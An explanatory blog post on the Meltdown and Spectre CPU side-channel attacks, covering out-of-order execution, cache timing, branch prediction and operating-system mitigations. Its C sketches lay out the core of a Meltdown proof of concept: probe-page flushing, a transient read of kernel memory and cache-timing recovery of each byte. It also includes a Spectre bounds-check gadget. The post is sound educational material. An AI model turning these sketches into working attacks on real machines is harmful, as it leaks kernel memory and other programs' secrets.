With the recent disclosure of the hardware bugs Meltdown and Spectre, the infosec world has been thrown into a bit of chaos. The bottom line is “It’s a very serious bug in the CPU itself; your computer is most probably affected, but the major operating systems are providing patches that mitigate the more serious issues. As always, update your OS to the latest version and you should be well-protected”.

But we were very interested in what’s going on at a technical level to make these exploits possible. The researchers who discovered these vulnerabilities provided papers with very in-depth details of the attacks. But we know that not everyone has a few hours to dig through technical papers, so this post will attempt to explain the issue in as simple terms as we can, while still giving enough information to understand how it works. Forgive us if we over-simplify some of the technical details – if you’re interested in the nitty-gritty, the research papers go into much more detail, and are really quite interesting – well worth a read (if you’re into that sort of thing). But if you don’t have time to delve into all of that, here’s a quick technical summary of what’s happening.

The TLDR is this: modern operating systems prevent the different programs on your computer from viewing each other’s data (so Microsoft Word can’t see what’s happening in the inner workings of Google Chrome). This isolation is an important security mechanism. Both Meltdown and Spectre break these protections in different ways, meaning that an attacker could view secret data from any program running on your computer. Both are bugs in the hardware itself, and affect CPUs going back to at least 2011, possibly further.

The Meltdown attack appears to be relatively easy to exploit, with severe impacts, but the major operating systems are providing patches to mitigate its more serious effects. It affects Intel chips. The Spectre attack is more complicated to exploit, but will also be significantly harder to fix. It affects Intel, AMD and ARM chips.

Background

Modern CPUs have a feature called out-of-order execution, which makes them significantly more efficient. This feature means that if a program has to perform, say, three things in order (A, then B, then C), but they’re not logically dependent on each other, the CPU might do them out of order for the sake of efficiency. So, for example, if step A is going to take a while, it will do steps B and C while it waits (rather than sitting idle for relatively large chunks of time).
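To make that concrete, here’s a minimal C sketch of the idea – this is our own illustrative example, with made-up names and values:

```c
#include <stdio.h>

static int data[1000000];  /* a large array, unlikely to be cached */

int main(void) {
    /* Step A: a load that may miss the cache and take a long time. */
    int a = data[999999];

    /* Steps B and C: independent work. An out-of-order CPU may
       execute these while the load above is still waiting on RAM,
       rather than sitting idle. */
    int b = 3 * 7;
    int c = 10 + 4;

    printf("%d %d %d\n", a, b, c);
    return 0;
}
```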

However, if it is later discovered that step A had an error, such that steps B and C should never have been run, the CPU throws away the results of those later steps and pretends they never happened – even though they actually did. This can feel a bit disconcerting at first: we’re essentially “rewriting the past”. But CPUs have been doing this for years, and it has been considered very robust. The programs themselves have no idea that this is going on – as far as they are concerned, they are executing exactly as expected.

So let’s say that we try to access some data (in memory) that we shouldn’t have access to… like, for example, the Operating System’s privileged memory (kernel space). Logically, the CPU does the right thing: it prevents us from accessing it. In reality, though, out-of-order execution can treat the access check (“should I be allowed to access this memory?”) and the access itself (“what data is stored there?”) as separate, independent steps, which it can do in parallel. This means that the memory may actually be accessed while the CPU simultaneously checks whether the access should be allowed. Then, when it’s discovered that we shouldn’t have access to that memory, the CPU throws away the result of the memory access, pretending that we never accessed it. We’ll say that this last step is “undone”.
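From the program’s point of view, everything looks clean. Here’s a small C sketch of that architecturally visible behaviour – the kernel address below is a made-up placeholder, and on Linux the attempted read simply ends in a SIGSEGV:

```c
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical privileged kernel address -- a placeholder, not a
   real target from the papers. */
#define KERNEL_ADDR ((volatile char *)0xffff800000000000UL)

static void on_segv(int sig) {
    (void)sig;
    /* The architectural outcome: access denied, as the OS intends. */
    printf("Caught SIGSEGV: the access check failed.\n");
    exit(0);
}

int main(void) {
    signal(SIGSEGV, on_segv);
    char value = *KERNEL_ADDR;  /* faults -- but the CPU may have
                                   transiently read the byte first */
    printf("%d\n", value);      /* never reached */
    return 0;
}
```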

However, it turns out that doing this actually has some side-effects: it leaves traces that something ran which should never have run.

For instance, another feature of modern CPUs is the cache, which holds a copy of some of the memory in your RAM, but is tens of times faster to access. When a chunk of memory is accessed for the first time, it’s put in this cache, and as a result, subsequent accesses to the same memory region are significantly faster. So much faster, in fact, that you can actually measure the difference. If a step is run that is later “undone”, any memory that it accessed may now be in the CPU’s cache – whereas, logically speaking, it shouldn’t be.
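You can see this timing difference for yourself. Here’s a rough C sketch of our own, using GCC/Clang x86 intrinsics (real exploits add fences around the timer for precision):

```c
#include <stdio.h>
#include <x86intrin.h>  /* __rdtscp, _mm_clflush (GCC/Clang, x86 only) */

static char buffer[4096];

/* Roughly time a single read of addr, in CPU cycles. */
static unsigned long long time_read(volatile char *addr) {
    unsigned int aux;
    unsigned long long start = __rdtscp(&aux);
    (void)*addr;
    return __rdtscp(&aux) - start;
}

int main(void) {
    _mm_clflush(buffer);  /* evict the buffer from the cache */

    unsigned long long uncached = time_read(buffer); /* goes to RAM */
    unsigned long long cached   = time_read(buffer); /* served by cache */

    printf("uncached: ~%llu cycles, cached: ~%llu cycles\n",
           uncached, cached);
    return 0;
}
```

On typical hardware, the second read comes back many times faster than the first.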

We should now have enough background information to understand the Meltdown attack.

Meltdown Attack


The Meltdown attack relies on the ability to run our own code on a system; so it assumes that the attacker has already compromised a system, and is trying to read protected data (e.g. kernel memory). The steps for the attack are the following:

Set up the attack:

A) Allocate 256 pages of memory (256 * 4KB)
B) Force the CPU’s cache to be reset to a known state (Intel helpfully provides us with a way of doing just this, though there are other ways).
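In C, steps A and B might look roughly like the sketch below. The “way Intel provides” is the clflush instruction, exposed through the _mm_clflush intrinsic; the names here are our own:

```c
#include <stdlib.h>
#include <emmintrin.h>  /* _mm_clflush (GCC/Clang, x86 only) */

#define PAGE_SIZE 4096
#define NUM_PAGES 256   /* one page per possible byte value */

static char *probe;

static void setup(void) {
    /* Step A: allocate 256 pages of memory (256 * 4KB). */
    probe = malloc(NUM_PAGES * PAGE_SIZE);

    /* Step B: flush every probe page out of the CPU cache, so the
       cache starts in a known state with respect to our pages. */
    for (int i = 0; i < NUM_PAGES; i++)
        _mm_clflush(&probe[i * PAGE_SIZE]);
}
```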

Perform the attack:

We pick a byte of memory that we want to read, and we:
C) Check that we’re allowed to read the byte of memory
D) If permission is granted, we read the byte of memory
E) If the byte’s value is a 1, then access page #1. If the byte’s value is a 2, then access page #2, etc.

Now why are we doing this series of complicated steps? Well, take a look at Step C. Let’s say we try to read some protected memory. The operating system will stop us… right?

Well, not quite. Because of out-of-order execution, the CPU may actually perform steps D and E while it’s waiting to find out whether we’re allowed to access the memory or not.

Let’s say that again, because it’s the most important part of this exploit: if we try to access protected memory using these steps, then steps D and E should never, ever, run. But because CPUs try to be clever, they may actually just go ahead and do it while waiting to see what happens in step C.

Now once step C completes, the CPU will realise that steps D and E should not have run; it will “undo” their results and continue with the program as though they never ran… but the damage is already done. By running step E, we’ve accessed one of our pages. As a result, that page is now in the CPU’s cache!
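Continuing our sketch from the setup above (reusing probe and PAGE_SIZE), steps C–E look something like this in C. A real exploit does this part in carefully tuned assembly and retries many times; here we just catch the fault with a signal handler to show the shape of it:

```c
#include <setjmp.h>
#include <signal.h>

static sigjmp_buf env;

static void on_fault(int sig) {
    (void)sig;
    /* Step C has resolved: permission denied. Architecturally we are
       stopped here -- but steps D and E may already have run
       transiently, pulling one probe page into the cache. */
    siglongjmp(env, 1);
}

static void leak_one_byte(volatile char *target) {
    signal(SIGSEGV, on_fault);
    if (sigsetjmp(env, 1) == 0) {
        /* Steps D and E: read the protected byte, then use its value
           as an index to touch one of our 256 probe pages. */
        unsigned char value = *target;
        (void)*(volatile char *)&probe[value * PAGE_SIZE];
    }
    /* Control resumes here after the fault; now we probe the cache. */
}
```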

We can now perform a “timing attack” on the cache: we access each of our 256 pages, and time how long each access takes. Most of those accesses will be relatively slow, because the CPU has to go all the way to RAM to look them up. But one (and only one) of those accesses will be extremely quick, because it’s in the cache (as a result of being accessed during step E).

So if (for example) we discover that the 155th page was accessed extremely quickly, we can reason that the value of the byte we tried to access (in step E) must have been 155. So even though we didn’t directly read protected memory, we’ve sneakily figured out what it is! This type of attack is known as a “side-channel attack”.
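And here’s the timing step of our sketch. The 80-cycle threshold is an illustrative number that would be tuned per machine, and real exploits probe the pages in a shuffled order to defeat the prefetcher:

```c
#include <x86intrin.h>  /* __rdtscp */

#define CACHE_HIT_THRESHOLD 80  /* cycles -- illustrative only */

/* Time a read of each probe page; the single fast one reveals the
   value of the secret byte. */
static int recover_byte(void) {
    for (int i = 0; i < NUM_PAGES; i++) {
        volatile char *addr = (volatile char *)&probe[i * PAGE_SIZE];
        unsigned int aux;
        unsigned long long start = __rdtscp(&aux);
        (void)*addr;
        unsigned long long elapsed = __rdtscp(&aux) - start;
        if (elapsed < CACHE_HIT_THRESHOLD)
            return i;  /* page i was cached => the secret byte was i */
    }
    return -1;  /* no clear hit; a real exploit would retry */
}
```

Repeat the leak-and-probe cycle once per byte, and you can read out memory wholesale.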

Using this approach, we can read any byte that is mapped into our program’s address space, which includes kernel memory. And because operating systems load other programs’ data into kernel memory, this means we can read other programs’ data too.

This even lets us break other isolation mechanisms such as containerisation. Since Docker containers share a kernel, it is possible to use this attack to read data from other containers.

The attack is also surprisingly fast: the researchers report that they were able to read privileged memory at a rate of 503KB/s, with an error rate of only 0.02%.

Spectre Attack


The Spectre attack is quite a bit more complex and exploits a different mechanism altogether, though it is in many ways similar to Meltdown. It takes advantage of the way in which CPUs try to make more accurate guesses about what a program is about to do, so that they don’t have to undo their out-of-order execution as often.

As programs run, CPUs learn what commonly happens in a program, and use that information to make better guesses about what code to run out-of-order. So (in highly simplified terms), if a program is up to instruction #100, and it then jumps to instruction #120, the CPU will in future be more likely to predict this when performing out-of-order optimisations. (“Next time the program is up to instruction #100, let’s predict that it will now go to #120”.) This feature is called Branch Prediction. For the more technical readers: when we talk about an “instruction number”, we’re actually referring to the virtual memory address of a CPU instruction, but we’re trying to keep it in layman’s terms.
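A classic way to see branch prediction at work (on a conditional branch rather than a jump, but it’s the same machinery): summing the same data is much faster once it’s sorted, because the branch becomes predictable. This is our own illustrative example:

```c
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

#define N 10000000

static int data[N];

static int cmp(const void *a, const void *b) {
    return *(const int *)a - *(const int *)b;
}

/* Sum the elements below 128; the if() is the branch the CPU's
   predictor has to guess ahead of time. */
static double time_branchy_sum(void) {
    clock_t start = clock();
    long sum = 0;
    for (int i = 0; i < N; i++)
        if (data[i] < 128)
            sum += data[i];
    volatile long sink = sum;  /* keep the loop from being optimised away */
    (void)sink;
    return (double)(clock() - start) / CLOCKS_PER_SEC;
}

int main(void) {
    for (int i = 0; i < N; i++)
        data[i] = rand() % 256;

    double random_order = time_branchy_sum(); /* branch is a coin flip */
    qsort(data, N, sizeof(int), cmp);
    double sorted_order = time_branchy_sum(); /* branch becomes predictable */

    printf("random: %.3fs, sorted: %.3fs\n", random_order, sorted_order);
    return 0;
}
```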

Researchers noticed that this prediction behaviour was actually shared between separate programs; that is, the CPU doesn’t ever take note of which program it was that jumped from instruction #100 to instruction #120 – it just remembers that it happened “in some program or another”. So if it observes the above behaviour in Program A, when Program B gets to its own instruction #100, branch prediction in *that* program will also predict that it will go to instruction #120 – even if that should never actually be possible!

To create the Spectre attack, a hacker will first look at a victim program (for example, a web browser, or a password manager – something they want to steal data from). They look for what we call a “gadget”: a specific set of instructions that allows this attack to work (it’s a bit complicated – check the research papers if you want to get stuck into the details). Let’s say that they find such a “gadget” at instruction #150.

Now, they run their own program. This attacking program first does a heap of instruction jumps – in this case, repeatedly from instruction #100 to instruction #150. The attacker’s aim here is to make the CPU’s branch prediction module think “any time I see a program at instruction #100, I expect that it will then go to instruction #150”.

Now consider the victim program. When it gets to instruction #100, branch prediction will jump in and say “I expect that this program will now jump to instruction #150”. As a result, if the CPU performs out-of-order execution, it will speculatively jump to the gadget at #150, before realising “oh, my prediction was wrong”. But as with the Meltdown attack, the damage is already done.

But what damage?

Well, the gadget that the attacker uses is selected in such a way that it will cause a memory lookup during the out-of-order execution, which will modify the CPU cache. Then, as in the Meltdown attack, the attacking program can detect this with a timing attack. In a sense, it uses part of the victim program against itself.
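The description above is Spectre’s “variant 2” (poisoning jump targets). The same leak-through-the-cache idea is easiest to see in the paper’s “variant 1” example, where the mispredicted branch is a simple bounds check. Simplified from the Spectre paper:

```c
#include <stddef.h>

/* Victim code: a bounds-checked array read. */
unsigned int array1_size = 16;
unsigned char array1[16];
char array2[256 * 4096];  /* plays the role of the attacker's probe pages */

void victim_function(size_t x) {
    if (x < array1_size) {
        /* If the branch predictor has been trained (by many in-bounds
           calls) to expect this check to pass, the CPU may run the line
           below speculatively even when x is out of bounds -- reading a
           byte beyond array1 and touching a probe page that encodes its
           value in the cache. */
        (void)*(volatile char *)&array2[array1[x] * 4096];
    }
}
```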

Our first thought was that existing virtual memory randomisation mechanisms like ASLR should make the attack much harder to pull off, as they mix up the instruction numbers (virtual memory addresses) each time a program is run, making the location of the gadget harder to predict. However, the researchers report that only lower-order memory bits are used for branch prediction, whereas ASLR only randomises higher-order bits.

We should note that, because of the particular mechanism it exploits, Spectre attacks have to be much more specific than Meltdown, and must be performed on an application-by-application basis. A hacker wanting to attack, say, Google Chrome must find a gadget inside Google Chrome and craft an exploit specific to that program, which will not work against any other program. The Meltdown attack, by contrast, is more of a one-size-fits-all attack.

What can be done about it?

Despite these being bugs in the hardware, there are things that can be done at the software level to mitigate the issue. Something that significantly increases the impact of the Meltdown attack is that kernel memory is immediately available to a program (“in its address space”), albeit protected. Because Meltdown bypasses this protection, that memory can be read. Linux, Windows and Mac OS X appear to be mitigating the issue by removing kernel memory from the program’s address space. This means that system calls (that is, actions that require the kernel) will take significantly longer. Estimates range all the way up to a 30% slowdown for programs heavily reliant on system calls, though this is a worst case, and most applications will likely be far less affected than that.

For the Spectre attack, as it does not rely on reading kernel memory, the above-mentioned mitigations will not do anything to prevent such attacks. In fact, because Spectre must be exploited on an application-by-application basis, it (currently) must also be defended against on an application-by-application basis, as specific exploits are discovered. The simplest approach to stop such attacks is likely just to edit and recompile applications to remove gadgets that are discovered; but this “whack-a-mole” approach is not a great long-term strategy.
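For an individual gadget, one commonly discussed fix is to insert a speculation barrier so that the sensitive memory access cannot run until the bounds check has actually resolved. Here’s a sketch, reusing the names from the variant-1 example above (on x86, the lfence instruction, exposed via the _mm_lfence intrinsic, is typically used for this):

```c
#include <emmintrin.h>  /* _mm_lfence (GCC/Clang, x86 only) */
#include <stddef.h>

void victim_function_fixed(size_t x) {
    if (x < array1_size) {
        /* Speculation barrier: the load below cannot run, even
           speculatively, until everything before it has resolved --
           so a mispredicted bounds check can no longer leak. */
        _mm_lfence();
        (void)*(volatile char *)&array2[array1[x] * 4096];
    }
}
```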

What happens from here?

This research opens an entirely new vector of attacks against software that is written according to all previously-known best practices. Unless a novel, general solution is found, we would expect to see new exploits against common software over the coming years, as defending against these attacks is very difficult, and requires an entirely new defensive mindset for software developers.

The implications for virtualised, containerised and cloud-based systems will also be interesting. Any system that runs on the same hardware as another system (as is common in these configurations) may be vulnerable to similar attacks. The big cloud providers appear to be on the ball with the most significant of these issues, patching their systems against the Meltdown attack; but how much of an impact other similar attacks will have is still an open research question. In the meantime, until better fixes are in place or more research is done, systems for which security is paramount must take into account the hardware they run on – whether in the cloud or on-premises – and may need to run on dedicated hardware to ensure that sensitive data is truly isolated from other systems.

Ultimately, these issues will need to be addressed by the CPU manufacturers in question, though it remains to be seen how they will approach this problem. One thing is certain: a lot more security researchers will be looking into these types of attacks in the coming months and years.